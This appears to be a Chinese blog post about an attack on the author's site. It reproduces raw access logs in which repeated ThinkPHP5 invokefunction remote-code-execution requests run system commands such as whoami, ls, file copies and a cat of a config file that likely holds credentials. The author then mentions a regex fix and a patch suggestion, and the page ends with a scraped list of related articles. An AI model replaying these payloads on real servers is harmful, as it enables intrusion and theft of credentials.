/trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/worldnow.tar.gz%20/home/website/worldnow/upload HTTP/1.1"40442952162.158.179.19- - [12/Dec/2018:19:25:06+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40442768162.158.179.19- - [12/Dec/2018:19:25:08+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40443054172.68.211.211- - [12/Dec/2018:19:25:18+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1"40443043172.68.211.211- - [12/Dec/2018:19:25:57+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1"40443043172.68.211.211- - [12/Dec/2018:19:26:09+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1"40443042162.158.179.19- - [12/Dec/2018:19:26:26+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config/config.ini.php HTTP/1.1"40443202172.68.253.158- - [12/Dec/2018:19:27:10+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"40443211172.68.253.158- - [12/Dec/2018:19:28:20+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"40443211162.158.179.175- - [12/Dec/2018:19:30:33+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com HTTP/1.1"40442857173.245.48.84- - [12/Dec/2018:19:32:15+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1"40443041162.158.179.175- - [12/Dec/2018:19:32:21+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1"40442914172.68.142.86- - [12/Dec/2018:20:06:03+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config HTTP/1.1"40442872108.162.226.176- - [12/Dec/2018:20:11:51+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1"40442941172.68.211.211- - [12/Dec/2018:20:17:09+0800]"GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=[0]=system&vars[1][]=ls HTTP/1.1"40442483172.68.255.5- - [13/Dec/2018:09:52:03+0800]"GET /trade//index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1"40442780108.162.215.85- - [13/Dec/2018:11:18:59+0800]"GET /trade/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40442766108.162.215.85- - [13/Dec/2018:11:19:13+0800]"GET /trade/index.php?s=../index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40442645108.162.215.85- - [13/Dec/2018:11:19:20+0800]"GET /trade/index.php?s=/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40442636108.162.215.85- - [13/Dec/2018:11:20:14+0800]"GET /world/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40443040108.162.215.85- - [13/Dec/2018:11:21:15+0800]"GET /world/index.php?s=index/thinkphp\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40443058108.162.215.85- - [13/Dec/2018:11:21:45+0800]"GET /world/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40443039108.162.215.85- - [13/Dec/2018:11:22:34+0800]"GET /traden//index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"4047355108.162.215.85- - [13/Dec/2018:11:22:46+0800]"GET /traden//index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1"4047355172.68.47.45- - [13/Dec/2018:11:22:59+0800]"GET /traden/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1"4047355172.68.47.45- - [13/Dec/2018:11:23:30+0800]"GET /traden/index.php?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1"4047355172.68.47.45- - [13/Dec/2018:11:23:39+0800]"GET /traden/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"4047355172.68.47.45- - [13/Dec/2018:11:23:50+0800]"GET /block//index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"404214172.68.47.45- - [13/Dec/2018:11:24:31+0800]"GET /world/age/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40444896172.69.33.134- - [13/Dec/2018:11:25:24+0800]"GET /en/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"404210172.69.33.134- - [13/Dec/2018:11:25:29+0800]"GET /index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"404207172.69.33.134- - [13/Dec/2018:11:27:28+0800]"GET /world/age/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40444897172.69.33.134- - [13/Dec/2018:11:27:34+0800]"GET /world/age/index.php?s=age/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40444884172.69.33.134- - [13/Dec/2018:11:27:45+0800]"GET /world/age/index.php?s=age/view/blue//think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40444813172.69.33.134- - [13/Dec/2018:11:27:50+0800]"GET /world/age/index.php?s=age/view/blue//invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40444773172.69.33.134- - [13/Dec/2018:11:27:53+0800]"GET /world/age/index.php?s=/view/blue//invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40444666172.69.33.134- - [13/Dec/2018:11:27:58+0800]"GET /world/age/index.php?s=/view/blue/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40444683172.69.33.134- - [13/Dec/2018:11:28:18+0800]"GET /world/age/index.php?s=/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"40444677172.68.211.211- - [13/Dec/2018:11:35:23+0800]"HEAD /world/function.asp HTTP/1.1"404-173.245.48.60- - [13/Dec/2018:11:35:23+0800]"HEAD /world/function.aspx HTTP/1.1"404-162.158.58.210- - [13/Dec/2018:11:35:23+0800]"HEAD /world/function.php HTTP/1.1"404-108.162.215.235- - [13/Dec/2018:11:43:03+0800]"HEAD /world/includes/functions.php HTTP/1.1"404-162.158.59.67- - [13/Dec/2018:11:48:20+0800]"HEAD /world/function/uploadproductpic.asp HTTP/1.1"404-162.158.59.67- - [13/Dec/2018:11:48:21+0800]"HEAD /world/system/function/uploadproductpic.asp HTTP/1.1"404-173.245.48.234- - [13/Dec/2018:11:48:29+0800]"HEAD /world/functions.asp HTTP/1.1"404-108.162.215.85- - [13/Dec/2018:11:49:05+0800]"HEAD /world/includes/functions.asp HTTP/1.1"404-173.245.48.234- - [13/Dec/2018:11:49:49+0800]"HEAD /world/function/uploadproductpic.aspx HTTP/1.1"404-173.245.48.234- - [13/Dec/2018:11:49:51+0800]"HEAD /world/system/function/uploadproductpic.aspx HTTP/1.1"404-108.162.215.85- - [13/Dec/2018:11:50:29+0800]"HEAD /world/functions.aspx HTTP/1.1"404-173.245.48.84- - [13/Dec/2018:11:50:31+0800]"HEAD /world/includes/functions.aspx HTTP/1.1"404-162.158.58.54- - [13/Dec/2018:12:09:23+0800]"HEAD /world/system/function/uploadproductpic.php HTTP/1.1"404-162.158.58.54- - [13/Dec/2018:12:09:23+0800]"HEAD /world/function/uploadproductpic.php HTTP/1.1"404-162.158.58.54- - [13/Dec/2018:12:14:51+0800]"HEAD /world/functions.php HTTP/1.1"404-162.158.58.210- - [13/Dec/2018:12:25:52+0800]"HEAD /world/function/ HTTP/1.1"404-162.158.58.210- - [13/Dec/2018:12:26:34+0800]"HEAD /world/include/function.asp HTTP/1.1"404-

吓得我赶紧加了个正则 加完就执行不了这个吊东西了 看来是该研究研究wireshark溯源了

修复建议

2、建议使用以上ThinkPHP5 开发的内容管理系统的用户及时检查是否存在该漏洞。

php/5.2.17漏洞,【漏洞预警】ThinkPHP5远程代码执行漏洞相关推荐

  1. ThinkPHP5远程代码执行漏洞

    thinkphp全利用工具​下载地址:关注挽风安全公众号 并发送thinkphp获取下载地址 https://zhuanlan.zhihu.com/p/52173644 2018年12月10日,白帽汇 ...

  2. wordpress php执行短代码_【漏洞通告】PHP远程代码执行漏洞(CVE-2019-11043)

    1.综述2019年9月14日至18举办的 Real World CTF中,国外安全研究员 Andrew Danau 在解决一道CTF题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常 ...

  3. [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  4. php5.2 $_GET漏洞,ThinkPHP5 远程代码执行漏洞-动态分析

    0x01 前言 ThinkPHP官方最近修复了一个严重的远程代码执行漏洞.这个主要漏洞原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本 ...

  5. rmi远程代码执行漏洞_Apache Solr反序列化远程代码执行漏洞分析(CVE20190192)

    更多全球网络安全资讯尽在邑安全 www.eansec.com ‍‍‍‍ 0x01 漏洞描述 Solr 是Apache软件基金会开源的搜索引擎框架,其中定义的ConfigAPI允许设置任意的jmx.se ...

  6. rmi远程代码执行漏洞_【最新漏洞简讯】WebLogic远程代码执行漏洞 (CVE202014645)

    ↑ 点击上方"SecMind安全管家"关注我们 情报编号:W1120200715 漏洞概述 WebLogic是Oracle公司出品的用于开发.集成.部署和管理大型分布式Web应用. ...

  7. thinkphp v5.0.11漏洞_Thinkphp 5.0远程代码执行漏洞

    0x01 简叙本次版本更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版 ...

  8. 安全漏洞:Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)

    阿里云漏洞库 (aliyun.com) 漏洞介绍 解决建议 1.排查应用是否引入了Apache log4j-core Jar包,若存在依赖引入,且在受影响版本范围内,则可能存在漏洞影响.同时为了避免在 ...

  9. 自检代码中trustmanager漏洞_通达OA远程代码执行漏洞通告

    报告编号:B6-2020-031801

最新文章

  1. springMVC swagger2
  2. 微软联合创始人都看好,这项技术有什么过人之处?
  3. 如何设计Lighthoused定位接收电路
  4. 空指针 java调用_java-变量引用与重复性get调用以避免空指针
  5. 想学python编程-【经验分享】新手如何快速学好Python?
  6. Java编程 的动态性,第 2部分: 引入反射--转载
  7. [LeetCode] Palindrome Number Valid Palindrome - 回文系列问题
  8. Jdk1.8 JUC源码增量解析(2)-atomic-LongAdder和LongAccumulator
  9. Arduino笔记-流水点灯
  10. 【Java进阶营】Java多线程基础学习(一)
  11. GO学习第三天——自定义包
  12. Java中单例模式—饿汉式和懒汉式
  13. 超大流量分布式系统架构解决方案 人人都是架构师2.0
  14. 微信小程序服务器配置https站点
  15. JS正则:按中英文逗号 中英文分号 回车 空格分隔/切割字符串
  16. 《metapath2vec: Scalable Representation Learning for Heterogeneous Networks》
  17. 斯坦福大学公开课:机器学习的动机与应用
  18. 亚马逊后台付款表(Custom Transaction)详解
  19. cadence 通孔焊盘_[转载]Cadence学习3(通孔类焊盘的建立)(转)
  20. 后端进度报告(2018.5.17)

热门文章

  1. 00后博士毕业拟任顶级985副研究员,网友扒出论文后吵翻了
  2. 过度拟合 Over fitting
  3. 鸿蒙os全新ui,华为工作人员:鸿蒙OS正式版将采用全新UI界面
  4. matlab数值积分方法求pi的近似值及其比较
  5. 「训练营老学员参与第⑦期指南」
  6. Python循环语句及随机数生成
  7. Numpy:astype(bool) 和 astype(int)
  8. C语言常用转义字符表
  9. 用css+html完成学校官网
  10. 做Java程序员真的没有春天吗?直击优秀开源框架灵魂